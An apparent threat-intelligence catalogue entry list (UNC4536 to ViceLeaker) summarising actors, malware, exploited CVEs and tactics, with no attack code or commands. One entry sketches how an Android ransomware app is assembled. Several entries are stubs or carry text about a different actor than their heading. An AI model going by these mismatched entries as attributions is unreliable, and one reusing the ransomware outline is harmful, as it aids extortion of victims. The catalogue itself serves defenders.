UNC4536 is a threat actor that distributes malware, including ICEDID, REDLINESTEALER, and CARBANAK, primarily through malvertising and trojanized MSIX installers masquerading as popular software. They utilize SEO poisoning tactics to direct victims to malicious sites that mimic legitimate software hosting platforms, facilitating the download of compromised installers. The actor employs a PowerShell script known as NUMOZYLOD to deliver tailored payloads, such as the CARBANAK backdoor, to their partners. Additionally, UNC4536 has been linked to campaigns that distribute NetSupport RAT, targeting IT administrators through fake sites promoted via Google Ads.
UNC4540
UNC4540 is a suspected Chinese threat actor targeting unpatched SonicWall Secure Mobile Access appliances to deploy custom malware that establishes long-term persistence for cyber espionage. The malware is designed to steal hashed credentials, provide shell access, and persist through firmware upgrades, utilizing a variant of the TinyShell backdoor. Mandiant has tracked UNC4540's activities back to 2021, noting their focus on maintaining access to compromised devices. The group's tactics are consistent with patterns observed in other Chinese threat actor campaigns targeting network devices for zero-day exploits.
UNC4736
UNC4736 is a North Korean threat actor that has been involved in supply chain attacks targeting software chains of 3CX and X_TRADER. They have used malware strains such as TAXHAUL, Coldcat, and VEILEDSIGNAL to compromise Windows and macOS systems. UNC4736 has been linked to financially motivated cybercrime operations, particularly focused on cryptocurrency and fintech-related services. They have also demonstrated infrastructure overlap with other North Korean and APT43 activity.
UNC4841
UNC4841 is a well-resourced threat actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. They have been observed selectively deploying specific malware families at high priority targets, with SKIPJACK being the most widely deployed. UNC4841 primarily targeted government and technology organizations, but they have also been observed targeting other verticals.
UNC4990
UNC4990 is a financially motivated threat actor that has been active since at least 2020. They primarily target users in Italy and rely on USB devices for initial infection. The group has evolved their tactics over time, using encoded text files on popular websites like GitHub and Vimeo to host payloads. They have been observed using sophisticated backdoors like QUIETBOARD and EMPTYSPACE, and have targeted organizations in various industries, particularly in Italy.
UNC5174
UNC5174, a Chinese state-sponsored threat actor, has been identified by Mandiant for exploiting critical vulnerabilities in F5 BIG-IP and ScreenConnect. They have been linked to targeting research and education institutions, businesses, charities, NGOs, and government organizations in Southeast Asia, the U.S., and the UK. UNC5174 is believed to have connections to China's Ministry of State Security and has been observed using custom tooling and the SUPERSHELL framework in their operations. The actor has shown indications of transitioning from hacktivist collectives to working as a contractor for Chinese intelligence agencies.
UNC5266
Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.
UNC5291
UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.
UNC5325
UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.
UNC5330
UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence. Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021.
UNC5337
UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221.
UNC5342
UNC5342 is a North Korea-linked APT that employs the EtherHiding technique to deliver malware and facilitate cryptocurrency theft. The actor has been observed deploying EtherRAT and JADESNOW malware, utilizing transaction history as a Dead Drop Resolver to embed payloads directly into the calldata of blockchain transactions. Their operations involve leveraging centralized API services to interact with public blockchains like Ethereum and BNB Smart Chain. The malware is designed to exfiltrate sensitive data, particularly targeting cryptocurrency wallets and credentials.
UNC5537
UNC5537 is a financially motivated threat actor targeting Snowflake customer databases. They use stolen credentials obtained from infostealer malware to access and exfiltrate large volumes of data. The compromised accounts lack multi-factor authentication, allowing UNC5537 to conduct data theft and extortion.
UNC5820
UNC5820 is a threat actor exploiting the CVE-2024-47575 vulnerability in Fortinet's FortiManager, allowing them to bypass authentication and execute arbitrary commands. They have been observed exfiltrating configuration data, user information, and FortiOS256-hashed passwords from managed FortiGate devices. While the actor has staged and exfiltrated sensitive data, there is currently no evidence of lateral movement or further compromise of additional environments. Mandiant has not determined whether UNC5820 is state-sponsored or identified its geographic location.
UNC6032
UNC6032 is a threat actor that weaponizes interest in AI tools, specifically targeting users with fake "AI video generator" websites to distribute malware, including Python-based infostealers and backdoors. Victims are typically directed to these sites through malicious social media ads that impersonate legitimate tools. Compromises have led to the exfiltration of sensitive data, including login credentials and credit card information, via the Telegram API. Google Threat Intelligence Group assesses UNC6032 to have a Vietnam nexus.
UNC6040
UNC6040 is a financially motivated threat cluster that employs vishing to gain access to organizations' Salesforce environments, facilitating large-scale data exfiltration. The group manipulates end users into authorizing malicious connected apps, often masquerading as IT support personnel, to exploit OAuth permissions. Following initial access, UNC6040 leverages harvested credentials to move laterally within victim networks, targeting other cloud platforms like Okta and Microsoft 365. Their operations are characterized by the use of Mullvad VPN IP addresses and a focus on social engineering tactics to bypass security measures.
UNC6148
UNC6148 is a financially motivated threat actor that targets SonicWall Secure Mobile Access 100 series appliances, leveraging stolen credentials and possibly zero-day exploits to deploy a persistent backdoor known as OVERSTEP. They utilize a kernel-level rootkit for stealthy access and have been observed establishing SSL VPN sessions to launch reverse shells and manipulate system files. The actor's operations include credential theft, data exfiltration, and potential ransomware deployment, with evidence suggesting they modify legitimate scripts to maintain persistence. Their activities are characterized by the reuse of OTP seeds and admin credentials, allowing continued access even after security patches are applied.
UNC6201
UNC6201 is a sophisticated Chinese state-sponsored hacking group that exploited CVE-2026–22769, a critical vulnerability in Dell RecoverPoint for Virtual Machines appliances, to establish a persistent presence. They deployed a permanent backdoor using techniques like Single Packet Authorization and "Port Knocking." Unlike typical hackers who conceal their activities within the Operating System, UNC6201 operated at the Virtualization Layer to avoid detection.
UNC6293
UNC6293 is a Russian state-sponsored threat actor identified by Google's Threat Intelligence Group (GTIG), which associates them with APT29 with low confidence. They have conducted campaigns utilizing social engineering tactics, including leveraging App-Specific Passwords for account compromises. GTIG has also noted a second campaign by UNC6293 that incorporates Ukrainian themes.
UNC6353
suspected Russian espionage group.
UNC6384
UNC6384 (also tracked as Vertigo Panda) is a Chinese-affiliated APT that conducts targeted espionage campaigns primarily against diplomatic entities in Southeast Asia and Europe, specifically Belgium and Hungary. The group exploits the ZDI-CAN-25373 Windows shortcut vulnerability to gain initial code execution via malicious .LNK files, deploying the PlugX RAT through sophisticated delivery mechanisms, including DLL side-loading and adversary-in-the-middle attacks. Their operations involve social engineering tactics, such as spear-phishing emails themed around diplomatic events, to entice victims into executing malicious payloads. UNC6384's use of valid code signing and HTTPS hosting enhances their evasion of detection and increases the likelihood of user interaction.
UNC6395
The actor systematically exported large volumes of data from numerous corporate Salesforce instances. GTIG assesses the primary intent of the threat actor is to harvest credentials. After the data was exfiltrated, the actor searched through the data to look for secrets that could be potentially used to compromise victim environments. GTIG observed UNC6395 targeting sensitive credentials such as Amazon Web Services (AWS) access keys (AKIA), passwords, and Snowflake-related access tokens. UNC6395 demonstrated operational security awareness by deleting query jobs, however logs were not impacted and organizations should still review relevant logs for evidence of data exposure.
UNC6426
UNC6426 exploited a supply chain compromise of the nx npm package to steal a developer's GitHub Personal Access Token and gain access to a victim's cloud environment. They abused the GitHub-to-AWS OpenID Connect trust to create a new administrator role, leveraging overly permissive permissions associated with the compromised GitHub-Actions-CloudFormation role. Using the legitimate open-source tool Nord Stream, UNC6426 conducted reconnaissance and extracted secrets from CI/CD environments, leading to the exfiltration of files from AWS S3 buckets and data destruction. The actor escalated to full AWS administrator permissions in under 72 hours.
UNC6485
UNC6485 is a cyber-espionage group exploiting CVE-2025-12480 in Gladinet’s Triofox file-sharing platform to gain initial network access and establish long-term persistence. They create unauthorized administrative accounts and deploy RATs, utilizing legitimate tools like Zoho Assist and AnyDesk to evade detection. Their TTPs indicate a sophisticated understanding of the platform, allowing them to blend malicious activities with legitimate administrative actions.
UNC6619
TGR-STA-1030 is a state-aligned cyberespionage group operating out of Asia, known for compromising government and critical infrastructure organizations across 37 countries. The group frequently deploys web shells, such as Behinder, Neo-reGeorg, and Godzilla, on both external and internal web servers to maintain access and enable lateral movement. TGR-STA-1030 has conducted extensive reconnaissance against government infrastructure, particularly focusing on nations in the South China Sea and Gulf of Thailand regions, as well as European countries like Germany. The group primarily targets government ministries and departments for espionage purposes, especially those exploring specific economic partnerships.
UNC6671
UNC6671 is involved in credential harvesting operations, utilizing vishing tactics to impersonate IT staff and directing victims to enter credentials on a victim-branded site. They have gained access to Okta customer accounts and employed PowerShell to download sensitive data from SharePoint and OneDrive. Their extortion tactics include aggressive harassment of victim personnel, and they have used unbranded extortion emails with different Tox IDs for communication. The threat actors have shown a preference for registering domains with Tucows, indicating potential operational differences from related threat groups.
UNC6691
financially motivated threat actor operating from China
UNC6692
UNC6692 is a threat actor that employs social engineering tactics, such as impersonating IT helpdesk personnel, to gain initial access to victim environments. They utilize a custom modular malware suite, including components like SNOWBELT, SNOWGLAZE, and SNOWBASIN, to facilitate deep network penetration and lateral movement. After extracting credentials from the LSASS process memory, they leverage Pass-The-Hash techniques to authenticate to domain controllers and exfiltrate sensitive data using LimeWire. The campaign highlights the systematic abuse of legitimate cloud services for payload delivery and command-and-control infrastructure.
UNC6748
UNC6748 targets users in Saudi Arabia through a fake Snapchat website, employing a backdoor known as GHOSTKNIFE for data exfiltration. Their exploitation process initially featured basic obfuscation, which evolved to include anti-debugging measures. The actor primarily leveraged CVE-2025-31277 and CVE-2026-20700 for RCE exploits, but exhibited inconsistencies in exploit support for different iOS versions. Additionally, UNC6748's delivery mechanisms incorporated session storage checks to manage infection attempts.
Unfading Sea Haze
Unfading Sea Haze is a threat actor focused on espionage, targeting government and military organizations in the South China Sea region since 2018. They employ spear-phishing emails with malicious attachments to gain initial access, followed by the deployment of custom malware such as Gh0st RAT variants and SharpJSHandler. The group utilizes scheduled tasks and manipulates local administrator accounts for persistence, while also incorporating Remote Monitoring and Management tools into their attacks. Unfading Sea Haze demonstrates a sophisticated and patient approach, remaining undetected for years and showing adaptability through evolving exfiltration tactics and malware arsenal.
UNG0002
UNG0002 is a technically adept APT conducting large-scale cyber espionage campaigns targeting strategic sectors in China, Hong Kong, and Pakistan, including defense, energy infrastructure, and healthcare. The group employs LNK shortcuts, VBScript files, and tools like Cobalt Strike and Metasploit, utilizing phishing emails with deceptive documents to lure victims. Their malware, such as Shadow RAT, leverages DLL Sideloading and supports remote command execution, making detection challenging. Analysts suggest that UNG0002 may originate from South or Southeast Asia, highlighting their resilience and adaptability in cyber operations.
UNG0901
UNG0901 is a cyber-espionage threat actor targeting Russian entities, particularly in the aerospace and defense sectors, utilizing spear-phishing tactics. They deploy the EAGLET backdoor, which exhibits functionalities similar to the Golang-based PhantomDL used by the Head Mare group, including shell, download, and upload capabilities. Notable overlaps in file-naming conventions and targeting strategies further reinforce the connection between UNG0901 and Head Mare.
Ungluk
Ransomware Ransom note instructs to use Bitmessage to get in contact with attacker - Secretishere.key - SECRETISHIDINGHEREINSIDE.KEY - secret.key
Unidad de Inteligencia Financiera (Argentina)
Financial Intelligence Unit (UIF) – Unidad de Inteligencia Financiera
Unikey
ransomware
UNION PANDA
UNION PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
UNION SPIDER
Adversary targeting manufacturing and industrial organizations.
Unit 8200
Unit 8200 is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
United Front Work Department
United Front Work Department (UFWD)
UNK_AcademicFlare
UNK_AcademicFlare is a suspected Russia-aligned threat actor that conducts device code phishing campaigns by leveraging compromised email addresses from government and military organizations. The actor engages in rapport building through benign outreach, ultimately leading to a phishing attempt via a Cloudflare Worker URL that spoofs a OneDrive account. Targeted sectors include government, think tanks, higher education, and transportation in the U.S. and Europe, with a focus on Russia and Ukraine-themed content. Their tactics include using compromised accounts for initial contact and employing device code phishing techniques to extract credentials.
UNK_DropPitch
Between March and June 2025, Proofpoint identified multiple China-aligned threat actors specifically targeting Taiwanese organizations within the semiconductor industry. This included a China-aligned threat actor tracked as UNK_FistBump targeting semiconductor design, manufacturing, and supply chain organizations in employment-themed phishing campaigns resulting in the delivery of Cobalt Strike or the custom Voldemort backdoor. Additionally, Proofpoint observed another China-aligned threat actor tracked as UNK_DropPitch targeting individuals in multiple major investment firms who specialize in investment analysis specifically within the Taiwanese semiconductor industry. This UNK_DropPitch targeting is exemplary of intelligence collection priorities spanning less obvious areas of the semiconductor ecosystem beyond just design and manufacturing entities. Finally, we also observed an actor tracked as UNK_SparkyCarp conducting credential phishing activity against a Taiwanese semiconductor company using a custom Adversary in the Middle (AiTM) phishing kit.
UNK_FistBump
Between March and June 2025, Proofpoint identified multiple China-aligned threat actors specifically targeting Taiwanese organizations within the semiconductor industry. This included a China-aligned threat actor tracked as UNK_FistBump targeting semiconductor design, manufacturing, and supply chain organizations in employment-themed phishing campaigns resulting in the delivery of Cobalt Strike or the custom Voldemort backdoor. Additionally, Proofpoint observed another China-aligned threat actor tracked as UNK_DropPitch targeting individuals in multiple major investment firms who specialize in investment analysis specifically within the Taiwanese semiconductor industry. This UNK_DropPitch targeting is exemplary of intelligence collection priorities spanning less obvious areas of the semiconductor ecosystem beyond just design and manufacturing entities. Finally, we also observed an actor tracked as UNK_SparkyCarp conducting credential phishing activity against a Taiwanese semiconductor company using a custom Adversary in the Middle (AiTM) phishing kit.
UNK_RemoteRogue
UNK_RemoteRogue is a suspected Russian threat actor that has been observed utilizing ClickFix in its infection chains, although this technique is not revolutionizing their operations but rather replacing existing installation methods. The group has a history of employing compromised intermediate mailservers, with specific infrastructure noted, such as the upstream concentrator at 80.66.66[.]197. Proofpoint recorded their use of ClickFix only once before they reverted to traditional campaigns that share similar characteristics, including targeting and infrastructure. UNK_RemoteRogue has been linked to phishing activities and has shown consistent patterns in its operational tactics.
UNK_SparkyCarp
Between March and June 2025, Proofpoint identified multiple China-aligned threat actors specifically targeting Taiwanese organizations within the semiconductor industry. This included a China-aligned threat actor tracked as UNK_FistBump targeting semiconductor design, manufacturing, and supply chain organizations in employment-themed phishing campaigns resulting in the delivery of Cobalt Strike or the custom Voldemort backdoor. Additionally, Proofpoint observed another China-aligned threat actor tracked as UNK_DropPitch targeting individuals in multiple major investment firms who specialize in investment analysis specifically within the Taiwanese semiconductor industry. This UNK_DropPitch targeting is exemplary of intelligence collection priorities spanning less obvious areas of the semiconductor ecosystem beyond just design and manufacturing entities. Finally, we also observed an actor tracked as UNK_SparkyCarp conducting credential phishing activity against a Taiwanese semiconductor company using a custom Adversary in the Middle (AiTM) phishing kit.
Unknown Crypted
ransomware
Unknown Lock
ransomware
Unknown XTBL
ransomware
Unknown
Unknown is an active extortion or ransomware group tracked by RansomLook.
Unlckr
ransomware
Unlock26 Ransomware
About: This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments.All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Unlock92
Ransomware
UnluckyWare
ransomware
UNNAM3D
ransomware
Unnamed Actor
This threat actor compromises civil society groups the Chinese Communist Party views as hostile to its interests, such as Tibetan, Uyghur, Hong Kong, and Taiwanese activist. The threat actor also targeted the Myanmar electoral commission.
Unnamed Android Ransomware
Uses APK Editor Pro. Picks and activates DEX>Smali from APK Editor. Utilizes LockService application and edits the “const-string v4, value” to a desired unlock key. Changes contact information within the ransom note. Once the victim has downloaded the malicious app, the only way to recover its content is to pay the ransom and receive the unlock key.
Unnamed Bin
ransomware
[Unnamed group]
Over the last few weeks, several significant leaks regarding a number of Iranian APTs took place. After analyzing and investigating the documents we conclude that they are authentic. Consequently, this causes considerable harm to the groups and their operation. The identity of the actor behind the leak is currently unknown, however based on the scope and the quality of the exposed documents and information, it appears that they are professional and highly capable. This leak will likely hamstring the groups' operation in the near future. Accordingly, in our assessment this will minimize the risk of potential attacks in the next few months and possibly even year. Note -most of the leaks are posted on Telegram channels that were created specifically for this purpose. Below are the three main Telegram groups on which the leaks were posted: Lab Dookhtegam pseudonym ("The people whose lips are stitched and sealed" –translation from Persian) –In this channel attack tools attributed to the group 'OilRig' were leaked; including a webshell that was inserted into the Technion, various tools that were used for DNS attacks, and more. Green Leakers–In this channel attack tools attributed to the group 'MuddyWatter' were leaked. The group's name and its symbol are identified with the "green movement", which led the protests in Iran after the Presidential elections in 2009. These protests were heavily repressed by the revolutionary guards (IRGC) Black Box–Unlike the previous two channels this has been around for a long time. On Friday May 5th, dozens of confidential documents labeled as "secret" (a high confidentiality level in Iran, one before the highest -top secret) were posted on this channel. The documents were related to Iranian attack groups' activity.
Unnamed ramsomware 1
A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality, the executables compiles an embedded encrypted C# program at runtime and launches it directly into memory.
Unrans
ransomware
Unsafe
Unsafe is an active extortion or ransomware group tracked by RansomLook.
UnsolicitedBooker
UnsolicitedBooker is a China-aligned APT group known for its persistent targeting of an unnamed international organization in Saudi Arabia, employing a backdoor called MarsSnake. The group utilizes spear-phishing emails, often featuring flight tickets as decoys, to infiltrate governmental organizations across Asia, Africa, and the Middle East. Their operations have included multiple intrusion attempts over several years, demonstrating a sustained interest in their target. MarsSnake provides significant control over infected machines, allowing for arbitrary command execution and file access.
UpdateHost Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Microsoft Copyright 2017 and requests ransom in bitcoins.
Urpage
What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats. Trend Micro covered the Delphi component in the context of the Confucius and Patchwork connection. They mentioned Urpage as a third unnamed threat actor connected to the two.
USDoD
USDoD is a threat actor known for leaking large databases of personal information, including from companies like Airbus and the U.S. Environmental Protection Agency. They have a history of engaging in high-profile data breaches, such as exposing data from the FBI's InfraGard program. USDoD has also been involved in web scraping to obtain information from websites like LinkedIn.
UselessDisk
ransomware
UselessFiles
ransomware
UserFilesLocker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
UserSec
UserSec is a pro-Russian hacking group that has been active since at least 2022. The group is known for its DDoS attacks and has collaborated with other pro-Russian hacking groups. In May 2023, UserSec announced a cyber campaign targeting NATO member states and joined forces with KillNet to launch attacks against NATO.
USR0
ransomware
UTA0178
While Volexity largely observed the attacker essentially living off the land, they still deployed a handful of malware files and tools during the course of the incident which primarily consisted of webshells, proxy utilities, and file modifications to allow credential harvesting. Once UTA0178 had access into the network via the ICS VPN appliance, their general approach was to pivot from system to system using compromised credentials. They would then further compromise credentials of users on any new system that was breached, and use these credentials to log into additional systems via RDP. Volexity observed the attacker obtaining credentials in a variety of ways.
UTA0218
UTA0218 is a threat actor with advanced capabilities, targeting organizations to establish a reverse shell, acquire tools, and extract data. They exploit vulnerabilities in firewall devices to move laterally within victim networks, focusing on obtaining domain backup keys and active directory credentials. The actor deploys a custom Python backdoor named UPSTYLE to execute commands and download additional tools. UTA0218 is likely state-backed, utilizing a mix of infrastructure including VPNs and compromised routers to store malicious files.
UTA0352
UTA0352 is a Russian threat actor attributed to phishing campaigns that exploit Microsoft OAuth 2.0 authentication workflows, often impersonating government officials to lure targets into providing sensitive information. The actor has been observed using malicious URLs disguised as legitimate services, such as a Romanian government authentication system. UTA0352 has also targeted Microsoft Teams and employed social engineering tactics via messaging platforms like Signal and WhatsApp. Volexity assesses with medium confidence that UTA0352 is involved in operations themed around Ukraine, targeting individuals and organizations historically associated with Russian threat activities.
UTA0355
UTA0355 is a Russian threat actor that conducts phishing campaigns targeting individuals and organizations associated with Ukraine. The actor initiates contact via email, inviting targets to a video conference, and follows up through Signal or WhatsApp to enhance legitimacy. After establishing communication, UTA0355 prompts victims to log in via a malicious M365 URL, subsequently requesting approval for a 2FA authentication to access email data. Volexity assesses with high confidence that UTA0355 successfully registered devices and downloaded email data from compromised accounts.
UTA0388
UTA0388 is a China-aligned APT known for spear-phishing campaigns targeting organizations in North America, Asia, and Europe, primarily to deliver a Go-based implant called GOVERSHELL. The group employs "rapport-building phishing" tactics, engaging targets in benign conversations before sending malicious links, and has been linked to the use of Large Language Models for crafting phishing emails in multiple languages. Technical analysis indicates that UTA0388 operates in the interests of the Chinese state, with a focus on Asian geopolitical issues, as evidenced by the use of Simplified Chinese in its development environment. Volexity assesses that UTA0388's operations reflect a sophisticated blend of traditional phishing techniques and modern automation.
UTG-Q-008
UTG-Q-008 is a threat actor targeting Linux platforms, primarily focusing on government and enterprise entities in China. They utilize a massive botnet network for espionage activities, including reconnaissance, brute-forcing, and Trojan component delivery. The actor has a history of compromising thousands of servers in China using a password dictionary based on Chinese Pinyin. UTG-Q-008 operates during standard working hours in the UTC+8 time zone, with potential ties to Eastern Europe.
UTG-Q-010
UTG-Q-010 is a financially motivated APT group from East Asia that has been active since late 2022, primarily targeting the pharmaceutical industry and cryptocurrency enthusiasts. They exploit legitimate Windows processes, such as "WerFault.exe," to sideload malicious DLLs like "faultrep.dll" and employ sophisticated phishing campaigns to deliver malware disguised as enticing content. Their recent campaigns have involved the use of the Pupy RAT and advanced defense evasion techniques, including in-memory execution and reflective DLL loading. UTG-Q-010's strategic focus on HR departments and the cryptocurrency sector highlights their understanding of target vulnerabilities and their ability to evade detection.
V Is Vendetta
V Is Vendetta is an active extortion or ransomware group tracked by RansomLook.
V8Locker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…
Vaca
ransomware
Vaggen
ransomware
valencia leaks
Official twitter account: https://x.com/ValenciaLeaks72
Vandev
Vandev is an active extortion or ransomware group tracked by RansomLook.
Vanguard Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware poses at MSOffice to fool users into opening the infected file. GO Ransomware
vanhelsing
Designed to target Windows systems, this ransomware employs advanced encryption techniques and appends a unique file extension to compromised files. Its stealthy evasion tactics and persistence mechanisms make detection and removal challenging. This highlights the need for proactive cybersecurity measures and a robust incident response strategy to safeguard data integrity and minimize breach risks.
Vanilla Tempest
Vice Society is a ransomware group that has been active since at least June 2021. They primarily target the education and healthcare sectors, but have also been observed targeting the manufacturing industry. The group has used multiple ransomware families and has been known to utilize PowerShell scripts for their attacks. There are similarities between Vice Society and the Rhysida ransomware group, suggesting a potential connection or rebranding.
Vanir Group
Vanir Group is an active extortion or ransomware group tracked by RansomLook.
VapeLauncher
Ransomware CryptoWire variant
Vapor Ransomware
MalwareHunterTeam discovered the Vapor Ransomware that appends the .Vapor extension to encrypted files. Will delete files if you do not pay in time.
Vasalocker
Vasalocker is an active extortion or ransomware group tracked by RansomLook.
[Vault 7/8]
An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. This leaking was done through WikiLeaks, since March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until his arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, by many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA's global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, include Apple's iPhone, Google's Android and Microsoft's Windows and even Samsung TVs, which are turned into covert microphones.
VAULT PANDA
A likely intelligence gathering-focused, China-nexus threat actor group that has targeted organizations in various sectors, especially financial services, around the world.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)]
VaultCrypt
Ransomware
VBRANSOM 7
Ransomware
VCrypt
ransomware
vCrypt1
ransomware
Vect
Vect is an active extortion or ransomware group tracked by RansomLook.
VegaLocker
ransomware
Velso
ransomware
Velvet Ant (Deprecated)
*We are no longer maintaining this object in favor of a similar object subsequently published by MITRE: "Velvet Ant" (Group). All relevant Tidal content extensions (e.g. additional Technique and Object relationships and metadata) have been added to the MITRE-authored object.* Velvet Ant is a suspected "China-nexus" espionage group that has notably targeted network devices as part of its operations. In one case involving an unspecified victim located in East Asia, the group was seen abusing a legacy, internet-exposed F5 BIG-IP load balancer appliance as a command-and-control mechanism, managing to maintain network persistence for a period of three years. As part of the broader investigation into the group, researchers also observed cases of zero-day exploitation of CVE-2024-20399 in Cisco Nexus network switch devices, which allowed actors to upload and execute previously unknown, custom malware. The researchers highlighted how sophisticated threat groups are increasingly targeting network appliances as means of network access and persistence, since those appliances "are often not sufficiently protected and monitored".[[Sygnia Velvet Ant June 17 2024](/references/5c313af4-61a8-449d-a6c7-f7ead6c72e19)][[Sygnia Velvet Ant July 1 2024](/references/a0cfeeb6-4617-4dea-80d2-290eaf2bcf5b)]
Velvet Tempest
Velvet Tempest is a threat actor associated with the BlackCat ransomware group. They have been observed deploying multiple ransomware payloads, including BlackCat, and have targeted various industries such as energy, fashion, tobacco, IT, and manufacturing. Velvet Tempest relies on access brokers to gain network access and utilizes tools like Cobalt Strike Beacons and PsExec for lateral movement and payload staging. They exfiltrate stolen data using a tool called StealBit and frequently disable unprotected antivirus products.
Vendetta
ransomware
Venis Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. In devVenisRansom@protonmail.com
VENOM SPIDER
VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker 'badbullzvenom', the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.
VenomRAT
ransomware
VenusLocker
Ransomware Based on EDA2
VevoLocker
ransomware
Vfokx
Vfokx is an active extortion or ransomware group tracked by RansomLook.
VHD
ransomware
ViACrypt
ransomware
Viagra
ransomware
VICE SPIDER
Vice Spider is a Russian-speaking ransomware group that has been active since at least April 2021 and is linked to a significant increase in identity-based attacks, with a reported 583% rise in Kerberoasting incidents. CrowdStrike attributes 27% of these intrusions specifically to Vice Spider, which exploits vulnerabilities in the Kerberos authentication protocol to crack user passwords.
ViceLeaker
